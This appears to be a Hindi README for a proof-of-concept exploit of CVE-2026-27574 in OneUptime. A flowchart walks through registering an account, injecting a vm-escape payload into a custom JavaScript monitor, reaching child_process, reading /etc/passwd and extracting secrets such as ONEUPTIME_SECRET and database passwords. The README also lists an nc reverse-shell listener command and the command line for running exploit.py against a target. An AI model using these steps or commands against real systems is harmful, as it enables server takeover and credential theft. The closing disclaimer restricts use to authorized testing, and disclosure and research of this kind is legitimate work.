
CVE-2026-27574 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, OneUptime में एक गंभीर कोड इंजेक्शन जो रिमोट कोड निष्पादन और पर्यावरण चर रिसाव को सक्षम बनाता है।
इसमें ठीक किया गया: OneUptime 10.0.0 (isolated-vm में माइग्रेशन)
एक्सप्लॉइट प्रकार: रिमोट
प्रमाणीकरण: निम्न-विशेषाधिकार (कोई भी पंजीकृत प्रोजेक्ट सदस्य)
प्रभाव: पूर्ण सर्वर समझौता, क्रेडेंशियल चोरी, क्लस्टर अधिग्रहण
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]# Start listener (if using reverse shell)
nc -lvnp 4444
# Run the exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
requests लाइब्रेरी (pip install requests)यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
Mohammed Idrees Banyamer द्वारा विकसित • जॉर्डन • @banyamer_security